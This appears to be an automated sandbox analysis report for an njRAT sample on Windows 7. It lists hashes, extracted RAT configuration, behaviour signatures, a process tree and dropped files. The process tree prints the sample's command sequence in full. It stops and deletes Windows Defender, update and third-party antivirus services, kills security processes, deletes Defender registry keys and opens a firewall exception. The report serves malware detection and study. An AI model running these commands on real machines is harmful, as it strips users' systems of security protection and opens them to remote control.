Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
29-09-2021 07:52
Static task
static1
Behavioral task
behavioral1
Sample
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
Resource
win7v20210408
General
-
Target
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe
-
Size
341KB
-
MD5
e8fb8e14c5e50dd51a7499b84e2c857a
-
SHA1
bad853c5496bc28f492c01cdc6fff77efd72dc74
-
SHA256
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c
-
SHA512
2b15a3c3cb4b04f978043d45ac32ed2ab7dfef11ec0b6010a73a2d39b8aa112b18846cb60383c63108fd7bcd4c7f9abae26b354320902a59f923d436d73f4131
Malware Config
Extracted
njrat
0.7d
cvcvc
127.0.0.1:6544
f08ba698cf12b161ed2e70452386d723
-
reg_key
f08ba698cf12b161ed2e70452386d723
-
splitter
Y262SUCZ4UJJ
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wscsvc\Security reg.exe -
Nirsoft 11 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft \Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft \Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft \Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft \Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft \Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe Nirsoft -
Executes dropped EXE 5 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exepid process 268 AdvancedRun.exe 948 AdvancedRun.exe 1788 AdvancedRun.exe 1772 AdvancedRun.exe 2024 cd.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 9 IoCs
Processes:
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exeAdvancedRun.exeAdvancedRun.exepid process 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe 268 AdvancedRun.exe 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe 1788 AdvancedRun.exe 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe -
Drops file in Program Files directory 21 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1648 taskkill.exe 1132 taskkill.exe 760 taskkill.exe 1076 taskkill.exe 1296 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.execd.exepid process 268 AdvancedRun.exe 268 AdvancedRun.exe 948 AdvancedRun.exe 948 AdvancedRun.exe 1788 AdvancedRun.exe 1788 AdvancedRun.exe 1772 AdvancedRun.exe 1772 AdvancedRun.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe 2024 cd.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
Processes:
AdvancedRun.exeAdvancedRun.exeAdvancedRun.exeAdvancedRun.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.execd.exedescription pid process Token: SeDebugPrivilege 268 AdvancedRun.exe Token: SeImpersonatePrivilege 268 AdvancedRun.exe Token: SeDebugPrivilege 948 AdvancedRun.exe Token: SeImpersonatePrivilege 948 AdvancedRun.exe Token: SeDebugPrivilege 1788 AdvancedRun.exe Token: SeImpersonatePrivilege 1788 AdvancedRun.exe Token: SeDebugPrivilege 1772 AdvancedRun.exe Token: SeImpersonatePrivilege 1772 AdvancedRun.exe Token: SeDebugPrivilege 1648 taskkill.exe Token: SeDebugPrivilege 1132 taskkill.exe Token: SeDebugPrivilege 760 taskkill.exe Token: SeDebugPrivilege 1076 taskkill.exe Token: SeDebugPrivilege 1296 taskkill.exe Token: SeDebugPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe Token: 33 2024 cd.exe Token: SeIncBasePriorityPrivilege 2024 cd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exeAdvancedRun.exeAdvancedRun.execmd.exedescription pid process target process PID 1988 wrote to memory of 268 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1988 wrote to memory of 268 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1988 wrote to memory of 268 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1988 wrote to memory of 268 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 268 wrote to memory of 948 268 AdvancedRun.exe AdvancedRun.exe PID 268 wrote to memory of 948 268 AdvancedRun.exe AdvancedRun.exe PID 268 wrote to memory of 948 268 AdvancedRun.exe AdvancedRun.exe PID 1988 wrote to memory of 1788 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1988 wrote to memory of 1788 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1988 wrote to memory of 1788 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1988 wrote to memory of 1788 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe AdvancedRun.exe PID 1788 wrote to memory of 1772 1788 AdvancedRun.exe AdvancedRun.exe PID 1788 wrote to memory of 1772 1788 AdvancedRun.exe AdvancedRun.exe PID 1788 wrote to memory of 1772 1788 AdvancedRun.exe AdvancedRun.exe PID 1988 wrote to memory of 1616 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 1988 wrote to memory of 1616 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 1988 wrote to memory of 1616 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 1988 wrote to memory of 1616 1988 e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe cmd.exe PID 1616 wrote to memory of 1664 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1664 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1664 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1664 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1520 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1520 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1520 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1520 1616 cmd.exe sc.exe PID 1616 wrote to memory of 296 1616 cmd.exe sc.exe PID 1616 wrote to memory of 296 1616 cmd.exe sc.exe PID 1616 wrote to memory of 296 1616 cmd.exe sc.exe PID 1616 wrote to memory of 296 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1000 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1000 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1000 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1000 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1732 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1732 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1732 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1732 1616 cmd.exe sc.exe PID 1616 wrote to memory of 612 1616 cmd.exe sc.exe PID 1616 wrote to memory of 612 1616 cmd.exe sc.exe PID 1616 wrote to memory of 612 1616 cmd.exe sc.exe PID 1616 wrote to memory of 612 1616 cmd.exe sc.exe PID 1616 wrote to memory of 744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1848 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1848 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1848 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1848 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1744 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1584 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1584 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1584 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1584 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1644 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1644 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1644 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1644 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1840 1616 cmd.exe sc.exe PID 1616 wrote to memory of 1840 1616 cmd.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"C:\Users\Admin\AppData\Local\Temp\e2ee9010ffc04e93475c14d0eec88610258cca058c25a6409914341b59c0b68c.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 2683⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /EXEFilename test.bat /RunAs 8 /Run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exe" /SpecialRun 140020920 17883⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.bat" "2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc stop windefend3⤵
-
C:\Windows\SysWOW64\sc.exesc config windefend start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete windefend3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdNisSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config WdNisSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdNisSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Sense3⤵
-
C:\Windows\SysWOW64\sc.exesc config Sense start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete Sense3⤵
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv3⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop usosvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config usosvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WaasMedicSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config WaasMedicSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop SecurityHealthService3⤵
-
C:\Windows\SysWOW64\sc.exesc config SecurityHealthService start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete SecurityHealthService3⤵
-
C:\Windows\SysWOW64\sc.exesc stop SDRSVC3⤵
-
C:\Windows\SysWOW64\sc.exesc config SDRSVC start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop wscsvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config wscsvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdiServiceHost3⤵
-
C:\Windows\SysWOW64\sc.exesc config WdiServiceHost start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdiSystemHost3⤵
-
C:\Windows\SysWOW64\sc.exesc config WdiSystemHost start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop InstallService3⤵
-
C:\Windows\SysWOW64\sc.exesc config InstallService Start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop VaultSvc3⤵
-
C:\Windows\SysWOW64\sc.exesc config VaultSvc start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop Spooler3⤵
-
C:\Windows\SysWOW64\sc.exesc config Spooler start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop LicenseManager3⤵
-
C:\Windows\SysWOW64\sc.exesc config LicenseManager start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc stop DiagTrack3⤵
-
C:\Windows\SysWOW64\sc.exesc config DiagTrack start= disabled3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im smartscreen.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SecurityHealthService.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f3⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f3⤵
- Modifies security service
-
C:\Windows\SysWOW64\sc.exesc delete windefend3⤵
-
C:\Windows\SysWOW64\sc.exesc delete sense3⤵
-
C:\Windows\SysWOW64\sc.exesc stop MBAMService3⤵
-
C:\Windows\SysWOW64\sc.exesc config MBAMService start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete MBAMService3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im MBAM.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc stop Bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc config Bytefenceservice start= disabled3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Bytefence.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\sc.exesc delete Bytefenceservice3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "avast! Tools"3⤵
-
C:\Windows\SysWOW64\sc.exesc config "avast! Tools" start= disabled3⤵
-
C:\Windows\SysWOW64\sc.exesc delete "avast! Tools"3⤵
-
C:\Windows\SysWOW64\sc.exesc stop "avast! Antivirus"3⤵
-
C:\Windows\SysWOW64\sc.exesc config "avast! Antivirus" start= disabled3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exe" "cd.exe" ENABLE3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exeMD5
41d608740bb964b50c7b79d28838a1c1
SHA1b604f184bcfb2fb1c533d02e43e572a90c2df080
SHA256826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d
SHA5121e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exeMD5
41d608740bb964b50c7b79d28838a1c1
SHA1b604f184bcfb2fb1c533d02e43e572a90c2df080
SHA256826a457a8a39e24ac925b31bcdb24fdb97bd468ff913a30ea2ce66d7bb52181d
SHA5121e403c1003e7e5e2f33120f6dcdf8c51cdc0203b1a7d3fc5db2eda0b8f5366928d028b4da1d23dd80a056293aff877820649df12abbbb50a6ca601ad8015f3af
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\test.batMD5
fedd9cb5e3ffd5436e973e7a627f3d3c
SHA1d6b5eb6d7663b927afc92d5c890296e911bd9336
SHA256ccd0633359705388d3597b9af4589498faca61acad2ec0be2711cd73cf47c774
SHA512604e97d7fe1e5a7b72ad701625838546c7681352db507d6b0ff5f3dd4bef41d705f044f074391d12e3f316b88669df7163bfd37ec6dd0184a956f25ebd737911
-
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
\Users\Admin\AppData\Local\Temp\RarSFX0\AdvancedRun.exeMD5
9125a507060e4b3a3e287452cb71e7a1
SHA1fab51cc2b16b4e9b3b20d7a9dd241967aaffb2a8
SHA25629c72091960423cc51728f70398ee2b8316b1442b894324fbcaa745698f14a64
SHA5125282b22dbc72ced34a48ada485fe11ceb2a3f41ac9739c88b519c12500d9617dc7fdab9cba8bb3dd4e7458e9426f783f5e2e940067e96516af042df3eaf10639
-
\Users\Admin\AppData\Local\Temp\RarSFX0\cd.exeMD5
41d608740bb964b50c7b79d28838a1c1
